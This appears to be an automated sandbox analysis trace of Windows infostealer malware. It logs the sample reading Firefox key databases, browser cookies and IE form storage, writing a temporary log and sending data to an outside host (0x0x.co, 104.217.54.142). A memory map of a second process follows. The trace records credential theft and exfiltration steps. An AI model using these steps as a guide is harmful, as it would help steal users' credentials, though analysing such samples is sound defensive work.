File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Delete filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox, type = file_attributes True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\profiles.ini, file_attributes = _O_RDONLY True 1
Fn
File Create filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, file_attributes = _O_WRONLY | _O_APPEND True 1
Fn
File Write filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, size = 132 True 1
Fn
Data
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db, type = file_attributes False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db, size = 100, size_out = 0 False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db-journal, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db, type = size, size_out = 0 True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db-wal, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db, type = size, size_out = 0 True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db-journal, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db, type = size, size_out = 0 True 2
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db-wal, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db, type = size, size_out = 0 True 1
Fn
File Create filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, file_attributes = _O_WRONLY | _O_APPEND True 1
Fn
File Write filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, size = 108 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 60, size_out = 60 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 18, size_out = 18 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 20, size_out = 20 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 11, size_out = 11 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 52, size_out = 52 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 14, size_out = 14 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 1, size_out = 1 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 7, size_out = 7 True 1
Fn
Data
File Create filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, file_attributes = _O_WRONLY | _O_APPEND True 1
Fn
File Write filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, size = 123 True 1
Fn
Data
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, type = file_attributes True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, size = 100, size_out = 100 True 1
Fn
Data
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-journal, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, type = size, size_out = 0 True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-wal, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, size = 32768, size_out = 32768 True 1
Fn
Data
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-wal, type = file_attributes False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-wal, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm, type = file_attributes False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm, type = size, size_out = 0 True 2
Fn
Module Create Mapping module_name = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm, filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm, protection = PAGE_READWRITE, maximum_size = 32768 True 1
Fn
Module Map C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm, process_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-wal, type = size, size_out = 0 True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, size = 32768, size_out = 32768 True 1
Fn
Data
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, size = 32768, size_out = 32768 True 1
Fn
Data
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, type = size, size_out = 0 True 18
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm, type = file_attributes True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-wal, type = file_attributes True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-wal True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\Ntdll, type = file_attributes False 1
Fn
Module Load module_name = Ntdll, base_address = 0x77230000 True 1
Fn
Module Get Address module_name = c:\windows\system32\ntdll.dll, function = RtlGetVersion, address_out = 0x772965e3 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 False 1
Fn
File Create filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, file_attributes = _O_WRONLY | _O_APPEND True 1
Fn
File Write filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, size = 85 True 1
Fn
Data
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Microsoft\Windows\INetCookies\, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\, type = file_attributes True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@ad13.adfarm1.adition[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@ad13.adfarm1.adition[1].txt, size = 8192, size_out = 89 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adfarm1.adition[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adfarm1.adition[1].txt, size = 8192, size_out = 101 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adform[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adform[1].txt, size = 8192, size_out = 73 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adnxs[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adnxs[1].txt, size = 8192, size_out = 554 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adtech[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adtech[2].txt, size = 8192, size_out = 102 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@advertising[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@advertising[1].txt, size = 8192, size_out = 282 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@api.bing[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@api.bing[2].txt, size = 8192, size_out = 223 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@at.atwola[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@at.atwola[2].txt, size = 8192, size_out = 515 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@bing[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@bing[1].txt, size = 8192, size_out = 264 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@bs.serving-sys[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@bs.serving-sys[1].txt, size = 8192, size_out = 112 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@bs.serving-sys[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@bs.serving-sys[2].txt, size = 8192, size_out = 92 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@c.bing[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@c.bing[2].txt, size = 8192, size_out = 456 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@c.msn[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@c.msn[2].txt, size = 8192, size_out = 130 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@google[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@google[2].txt, size = 8192, size_out = 281 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@linkedin[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@linkedin[2].txt, size = 8192, size_out = 271 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@msn[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@msn[1].txt, size = 8192, size_out = 534 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@scorecardresearch[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@scorecardresearch[2].txt, size = 8192, size_out = 202 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@serving-sys[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@serving-sys[1].txt, size = 8192, size_out = 383 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@track.adform[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@track.adform[1].txt, size = 8192, size_out = 75 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@www.bing[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@www.bing[1].txt, size = 8192, size_out = 117 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@www.linkedin[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@www.linkedin[1].txt, size = 8192, size_out = 168 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@www.msn[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@www.msn[2].txt, size = 8192, size_out = 1006 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1409, size_out = 1409 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1235, size_out = 1235 True 1
Fn
Data
File Create filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, file_attributes = _O_RDONLY True 1
Fn
File Read filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, size = 453, size_out = 448 True 1
Fn
Data
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\ws2_32, base_address = 0x77380000 True 1
Fn
Module Get Address module_name = c:\windows\system32\ws2_32.dll, function = getaddrinfo, address_out = 0x77384296 True 2
Fn
Module Get Address module_name = c:\windows\system32\ws2_32.dll, function = getnameinfo, address_out = 0x773867b7 True 1
Fn
Module Get Address module_name = c:\windows\system32\ws2_32.dll, function = freeaddrinfo, address_out = 0x77384b1b True 1
Fn
DNS Resolve Name host = 0x0x.co, address_out = 104.217.54.142, service = 80 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 104.217.54.142, remote_port = 80 True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 2237, size_out = 2237 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 191
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 322, size_out = 322 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 2, size_out = 2 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 5
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
File Delete filename = c:\users\eebsym5\appdata\local\temp\mybrs.log True 1
Fn
Module Get Handle module_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, base_address = 0x1250000 True 2
Fn
Module Load module_name = api-ms-win-appmodel-runtime-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = ext-ms-win-kernel32-package-current-l1-1-0, base_address = 0x0 False 2
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Process #7: jrsi6vakyydz.exe
183 26
»
Information Value
ID #7
File Name c:\users\eebsym5\appdata\local\temp\jrsi6vakyydz.exe
Command Line "C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe"
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:01:31, Reason: Child Process
Unmonitor End Time: 00:01:43, Reason: Self Terminated
Monitor Duration 00:00:12
OS Process Information
»
Information Value
PID 0xbf4
Parent PID 0x9a4 (c:\users\eebsym5\desktop\output.113528456.txt.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x BF8
0x C04
0x C08
0x C0C
0x C10
0x C14
0x C18
0x C1C
0x C20
0x C24
0x C28
0x C2C
0x C30
0x C80
0x C84
0x CB0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory rw True False False -
private_0x00000000000d0000 0x000d0000 0x001cffff Private Memory rw True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory r True False False -
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory rw True False False -
pagefile_0x00000000001f0000 0x001f0000 0x002b7fff Pagefile Backed Memory r True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory rw True False False -
pagefile_0x00000000003c0000 0x003c0000 0x004c0fff Pagefile Backed Memory r True False False -
private_0x00000000004d0000 0x004d0000 0x0050ffff Private Memory rwx True False False -
pagefile_0x0000000000510000 0x00510000 0x00510fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000520000 0x00520000 0x00520fff Pagefile Backed Memory rw True False False -
private_0x0000000000530000 0x00530000 0x0053ffff Private Memory - True False False -
private_0x0000000000540000 0x00540000 0x0054ffff Private Memory - True False False -
private_0x0000000000550000 0x00550000 0x0055ffff Private Memory - True False False -
private_0x0000000000560000 0x00560000 0x0056ffff Private Memory - True False False -
private_0x0000000000570000 0x00570000 0x0057ffff Private Memory - True False False -
private_0x0000000000580000 0x00580000 0x005bffff Private Memory rwx True False False -
private_0x00000000005c0000 0x005c0000 0x005cffff Private Memory - True False False -
pagefile_0x00000000005d0000 0x005d0000 0x005d0fff Pagefile Backed Memory rw True False False -
rpcss.dll 0x005e0000 0x0063bfff Memory Mapped File r False False False -
private_0x00000000005e0000 0x005e0000 0x005effff Private Memory - True False False -
l_intl.nls 0x005f0000 0x005f2fff Memory Mapped File r False False False -
pagefile_0x0000000000600000 0x00600000 0x00600fff Pagefile Backed Memory r True False False -
private_0x0000000000610000 0x00610000 0x0061ffff Private Memory rw True False False -
private_0x0000000000620000 0x00620000 0x0062ffff Private Memory - True False False -
pagefile_0x0000000000630000 0x00630000 0x00631fff Pagefile Backed Memory r True False False -
sorttbls.nlp 0x00640000 0x00644fff Memory Mapped File r False False False -
private_0x0000000000650000 0x00650000 0x0065ffff Private Memory rw True False False -
private_0x0000000000660000 0x00660000 0x006fffff Private Memory rw True False False -
sortkey.nlp 0x00700000 0x00740fff Memory Mapped File r False False False -
pagefile_0x0000000000750000 0x00750000 0x0076ffff Pagefile Backed Memory rw True False False -
private_0x0000000000770000 0x00770000 0x0077ffff Private Memory - True False False -
pagefile_0x0000000000780000 0x00780000 0x00780fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000790000 0x00790000 0x00796fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007a0000 0x007a0000 0x007a1fff Pagefile Backed Memory rw True False False -
private_0x00000000007b0000 0x007b0000 0x007bffff Private Memory rw True False False -
private_0x00000000007c0000 0x007c0000 0x0084ffff Private Memory rw True False False -
pagefile_0x00000000007c0000 0x007c0000 0x007d0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007e0000 0x007e0000 0x007e0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007f0000 0x007f0000 0x007f0fff Pagefile Backed Memory r True False False -
private_0x0000000000810000 0x00810000 0x0084ffff Private Memory rw True False False -
private_0x0000000000880000 0x00880000 0x0097ffff Private Memory rw True False False -
sortdefault.nls 0x00980000 0x00c4efff Memory Mapped File r False False False -
jrsi6vakyydz.exe 0x00ca0000 0x00cdbfff Memory Mapped File rwx True True True
pagefile_0x0000000000ce0000 0x00ce0000 0x018dffff Pagefile Backed Memory r True False False -
private_0x00000000018e0000 0x018e0000 0x038dffff Private Memory rw True False False -
private_0x0000000003960000 0x03960000 0x03a5ffff Private Memory rw True False False -
private_0x0000000003a60000 0x03a60000 0x03b4ffff Private Memory rw True False False -
private_0x0000000003a60000 0x03a60000 0x03b0ffff Private Memory rw True False False -
private_0x0000000003b10000 0x03b10000 0x03b4ffff Private Memory rw True False False -
pagefile_0x0000000003b50000 0x03b50000 0x03c2efff Pagefile Backed Memory r True False False -
private_0x0000000003c70000 0x03c70000 0x03d6ffff Private Memory rw True False False -
pagefile_0x0000000003d70000 0x03d70000 0x04162fff Pagefile Backed Memory r True False False -
kernelbase.dll.mui 0x04170000 0x0422ffff Memory Mapped File rw False False False -
private_0x0000000004250000 0x04250000 0x0434ffff Private Memory rw True False False -
private_0x0000000004390000 0x04390000 0x0448ffff Private Memory rw True False False -
private_0x00000000044a0000 0x044a0000 0x0459ffff Private Memory rw True False False -
private_0x00000000045a0000 0x045a0000 0x0468ffff Private Memory rw True False False -
private_0x0000000004690000 0x04690000 0x0478ffff Private Memory rw True False False -
private_0x0000000004790000 0x04790000 0x0488ffff Private Memory rw True False False -
private_0x0000000004930000 0x04930000 0x04a2ffff Private Memory rw True False False -
private_0x0000000004a30000 0x04a30000 0x04bbffff Private Memory rw True False False -
private_0x0000000004c00000 0x04c00000 0x04cfffff Private Memory rw True False False -
private_0x0000000004d00000 0x04d00000 0x04dfffff Private Memory rw True False False -
system.windows.forms.ni.dll 0x68aa0000 0x6967dfff Memory Mapped File rwx True False False -
system.ni.dll 0x69680000 0x69e1bfff Memory Mapped File rwx True False False -
wminet_utils.dll 0x6a310000 0x6a318fff Memory Mapped File rwx True False False -
system.management.ni.dll 0x6b280000 0x6b383fff Memory Mapped File rwx True False False -
system.xml.ni.dll 0x6b870000 0x6bda5fff Memory Mapped File rwx True False False -
system.windows.forms.dll 0x6b8e0000 0x6bdadfff Memory Mapped File rwx False False False -
system.drawing.ni.dll 0x6bdb0000 0x6bf37fff Memory Mapped File rwx True False False -
mscorlib.ni.dll 0x6bf40000 0x6ca37fff Memory Mapped File rwx True False False -
mscorwks.dll 0x6ca40000 0x6cfeafff Memory Mapped File rwx True False False -
system.configuration.ni.dll 0x6de90000 0x6df80fff Memory Mapped File rwx True False False -
msvcr80.dll 0x6e180000 0x6e21afff Memory Mapped File rwx False False False -
wmiutils.dll 0x6e880000 0x6e896fff Memory Mapped File rwx False False False -
wbemprox.dll 0x6ebe0000 0x6ebe9fff Memory Mapped File rwx False False False -
shfolder.dll 0x6efd0000 0x6efd4fff Memory Mapped File rwx False False False -
wbemcomn.dll 0x6f7c0000 0x6f81bfff Memory Mapped File rwx False False False -
mscorjit.dll 0x6f900000 0x6f95afff Memory Mapped File rwx True False False -
mscoreei.dll 0x6f960000 0x6f9d7fff Memory Mapped File rwx True False False -
webio.dll 0x6fcf0000 0x6fd3efff Memory Mapped File rwx False False False -
winhttp.dll 0x6fd40000 0x6fd97fff Memory Mapped File rwx False False False -
rasadhlp.dll 0x704a0000 0x704a5fff Memory Mapped File rwx False False False -
mscoree.dll 0x71de0000 0x71e29fff Memory Mapped File rwx True False False -
rasman.dll 0x725f0000 0x72604fff Memory Mapped File rwx False False False -
rasapi32.dll 0x72610000 0x72661fff Memory Mapped File rwx False False False -
rtutils.dll 0x73390000 0x7339cfff Memory Mapped File rwx False False False -
dhcpcsvc.dll 0x73670000 0x73681fff Memory Mapped File rwx False False False -
dhcpcsvc6.dll 0x73690000 0x7369cfff Memory Mapped File rwx False False False -
fwpuclnt.dll 0x736b0000 0x736e7fff Memory Mapped File rwx False False False -
winnsi.dll 0x737c0000 0x737c6fff Memory Mapped File rwx False False False -
iphlpapi.dll 0x737d0000 0x737ebfff Memory Mapped File rwx False False False -
uxtheme.dll 0x741e0000 0x7421ffff Memory Mapped File rwx False False False -
version.dll 0x748d0000 0x748d8fff Memory Mapped File rwx False False False -
wshtcpip.dll 0x74960000 0x74964fff Memory Mapped File rwx False False False -
credssp.dll 0x74b20000 0x74b27fff Memory Mapped File rwx False False False -
rsaenh.dll 0x74bf0000 0x74c2afff Memory Mapped File rwx False False False -
dnsapi.dll 0x74cd0000 0x74d13fff Memory Mapped File rwx False False False -
wship6.dll 0x74e00000 0x74e05fff Memory Mapped File rwx False False False -
mswsock.dll 0x74e10000 0x74e4bfff Memory Mapped File rwx False False False -
cryptsp.dll 0x74e50000 0x74e65fff Memory Mapped File rwx False False False -
bcrypt.dll 0x74f80000 0x74f96fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
rpcrtremote.dll 0x75370000 0x7537dfff Memory Mapped File rwx False False False -
profapi.dll 0x75380000 0x7538afff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x75590000 0x755b6fff Memory Mapped File rwx False False False -
